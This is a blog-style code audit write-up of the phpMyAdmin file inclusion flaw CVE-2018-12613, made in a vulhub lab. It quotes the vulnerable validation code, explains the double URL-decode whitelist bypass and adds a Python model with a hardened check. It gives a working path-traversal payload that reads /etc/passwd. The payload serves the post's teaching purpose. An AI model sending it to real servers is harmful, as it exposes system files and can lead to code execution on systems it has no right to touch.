A code audit note: CVE-2018-12613, phpMyAdmin file inclusion vulnerability
2022-08-02 04:02:00 【Learn Safe Tom Cat】
Preface
It has been 20 days since my last blog post. I have been working recently and learning much less. Two days ago I played the phpMyAdmin file inclusion vulnerability (CVE-2018-12613) on the vulhub range, but there were parts I did not understand. After taking some time to search Baidu and work through it, I am writing these notes so I do not forget.
Vulnerability description
An attacker can exploit this vulnerability to include (view and potentially execute) files on the server. The flaw lies in the part of the code where pages are redirected and loaded within phpMyAdmin, combined with an incorrect test for whitelisted pages. The attacker must be authenticated, except in these situations:
$cfg['AllowArbitraryServer'] = true: the attacker can specify any host he/she already controls and execute arbitrary code on phpMyAdmin;
$cfg['ServerDefault'] = 0: this bypasses the login and runs the vulnerable code without any authentication.
Affected versions
phpMyAdmin 4.8.0 and 4.8.1
Vulnerability analysis
Lines 50 to 63 of index.php:
$target_blacklist = array (
    'import.php', 'export.php'
); # defines a blacklist

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])                          # target must not be empty
    && is_string($_REQUEST['target'])                     # target must be a string
    && ! preg_match('/^index/', $_REQUEST['target'])      # target must not start with "index"
    && ! in_array($_REQUEST['target'], $target_blacklist) # target must not be in the blacklist
    && Core::checkPageValidity($_REQUEST['target'])       # checkPageValidity() must return true
) {
    include $_REQUEST['target']; # all five conditions met: the file is included
    exit;
}
The first four conditions are easy to satisfy; it is the fifth that is a little more troublesome.
Lines 443 to 476 of Core.php:
public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist; # initialize the whitelist
    }
    if (! isset($page) || !is_string($page)) {
        return false; # return false if the parameter is unset or not a string
    }
    if (in_array($page, $whitelist)) {
        return true; # the parameter exactly as passed is in the whitelist: return true
    }
    # if that did not match, the following code runs
    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?') # take the part of the parameter before the first '?'
    );
    if (in_array($_page, $whitelist)) {
        return true; # if that prefix is in the whitelist, return true
    }
    # if that did not match either, the following code runs
    $_page = urldecode($page); # the trigger of this vulnerability: an extra URL decode is applied here
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?') # again take the part before the first '?'
    );
    if (in_array($_page, $whitelist)) {
        return true; # if the decoded prefix is in the whitelist, return true
    }
    # nothing matched: return false
    return false;
}
The whitelist is at lines 31 to 79 of Core.php:
public static $goto_whitelist = array(
    'db_datadict.php',
    'db_sql.php',
    'db_events.php',
    'db_export.php',
    'db_importdocsql.php',
    'db_multi_table_query.php',
    'db_structure.php',
    'db_import.php',
    'db_operations.php',
    'db_search.php',
    'db_routines.php',
    'export.php',
    'import.php',
    'index.php',
    'pdf_pages.php',
    'pdf_schema.php',
    'server_binlog.php',
    'server_collations.php',
    'server_databases.php',
    'server_engines.php',
    'server_export.php',
    'server_import.php',
    'server_privileges.php',
    'server_sql.php',
    'server_status.php',
    'server_status_advisor.php',
    'server_status_monitor.php',
    'server_status_queries.php',
    'server_status_variables.php',
    'server_variables.php',
    'sql.php',
    'tbl_addfield.php',
    'tbl_change.php',
    'tbl_create.php',
    'tbl_import.php',
    'tbl_indexes.php',
    'tbl_sql.php',
    'tbl_export.php',
    'tbl_operations.php',
    'tbl_structure.php',
    'tbl_relation.php',
    'tbl_replace.php',
    'tbl_row_action.php',
    'tbl_select.php',
    'tbl_zoom_select.php',
    'transformation_overview.php',
    'transformation_wrapper.php',
    'user_password.php',
);
Payload: index.php?target=sql.php%253f/../../../../../../../../etc/passwd
Explanation: the server URL-decodes target=sql.php%253f once when it populates $_REQUEST, giving target=sql.php%3f; the urldecode() inside checkPageValidity() decodes it a second time, giving target=sql.php?, and the part before the ? is in the whitelist, so checkPageValidity() is bypassed. The include statement, however, uses the once-decoded $_REQUEST['target'], i.e. sql.php%3f/../../../../../../../../etc/passwd; PHP resolves the ../ segments lexically, so the non-existent sql.php%3f directory is simply walked back out of and /etc/passwd is included.
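To make the two-layer check and the bypass concrete, here is a Python model of the five conditions in index.php and of checkPageValidity(), with a hardened exact-match variant beside it. This is an added example, not phpMyAdmin's own code: the whitelist is a constructed subset of Core::$goto_whitelist, the web root /var/www/html and the hardened variant are my assumptions (the hardened function is not a copy of the upstream patch), and posixpath.normpath stands in for PHP's lexical resolution of the ../ segments in the include path.

```python
import posixpath
from urllib.parse import unquote_plus

# Constructed subset of Core::$goto_whitelist; enough for the demo.
GOTO_WHITELIST = ["db_sql.php", "index.php", "sql.php", "tbl_sql.php"]
# The blacklist from index.php lines 50-52.
TARGET_BLACKLIST = ["import.php", "export.php"]


def _before_question_mark(s):
    """mb_substr($s, 0, mb_strpos($s . '?', '?')): the part before the first '?'."""
    return s.split("?", 1)[0]


def check_page_validity_vulnerable(page, whitelist=None):
    """Mirror of the 4.8.0/4.8.1 Core::checkPageValidity() logic: three chances
    to match the whitelist, the last one on a urldecode()'d *copy* of $page."""
    whitelist = whitelist or GOTO_WHITELIST
    if not isinstance(page, str):
        return False
    if page in whitelist:
        return True
    if _before_question_mark(page) in whitelist:
        return True
    # The extra decode: '%3f' turns into '?', so 'sql.php%3f/../x' is cut down
    # to 'sql.php'. unquote_plus matches PHP urldecode(), which also maps '+'.
    if _before_question_mark(unquote_plus(page)) in whitelist:
        return True
    return False


def check_page_validity_hardened(page, whitelist=None):
    """Exact match only, for use when the value will be passed to include:
    no '?'-stripping and no extra decoding (my hardening, not upstream's patch)."""
    whitelist = whitelist or GOTO_WHITELIST
    return isinstance(page, str) and page in whitelist


def index_php_would_include(target, validator):
    """The five conditions from index.php lines 50-63. Returns the string that
    would reach `include`, or None if any condition fails."""
    if not target or not isinstance(target, str):
        return None
    if target.startswith("index"):
        return None
    if target in TARGET_BLACKLIST:
        return None
    if not validator(target):
        return None
    return target  # include $_REQUEST['target']: the raw, once-decoded value


def resolved_include_path(target, webroot="/var/www/html"):
    """PHP resolves '..' lexically, so a first segment that does not exist is
    simply walked back out of; posixpath.normpath models that (webroot assumed)."""
    return posixpath.normpath(posixpath.join(webroot, target))


# Constructed request: the client sends
#   index.php?target=sql.php%253f/../../../../../../../../etc/passwd
RAW_QUERY_VALUE = "sql.php%253f" + "/.." * 8 + "/etc/passwd"
# PHP decodes the query string once while building $_REQUEST.
REQUEST_TARGET = unquote_plus(RAW_QUERY_VALUE)  # 'sql.php%3f/../../../../../../../../etc/passwd'


if __name__ == "__main__":
    print("$_REQUEST['target'] =", REQUEST_TARGET)
    for name, check in (("vulnerable", check_page_validity_vulnerable),
                        ("hardened", check_page_validity_hardened)):
        included = index_php_would_include(REQUEST_TARGET, check)
        print(f"{name:10s} include ->",
              resolved_include_path(included) if included else "rejected")
```

Running it shows that the once-decoded $_REQUEST['target'] passes the vulnerable check, is rejected by the hardened one, and that the include path normalizes to /etc/passwd. The '?'-stripping and urldecode() branches exist because the same function validates redirect targets such as sql.php?db=test, which the exact-match variant rejects; the hardening therefore only makes sense on the include path, where a bare whitelisted filename is the only legitimate input.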
Summary
Although a filtering check is performed here, the check is made on a decoded copy ($_page), while the value we passed in is never modified and is exactly what gets included; that is why the arbitrary file inclusion occurs.
The above is my understanding of this vulnerability; if anything is wrong, please point it out.
On my own problems: although I wrote this down, there are still many functions I did not understand during the code audit. Next I will learn PHP and Java for future code audits. This is also my first code audit article, so if anything is unclear or incorrect, please let me know!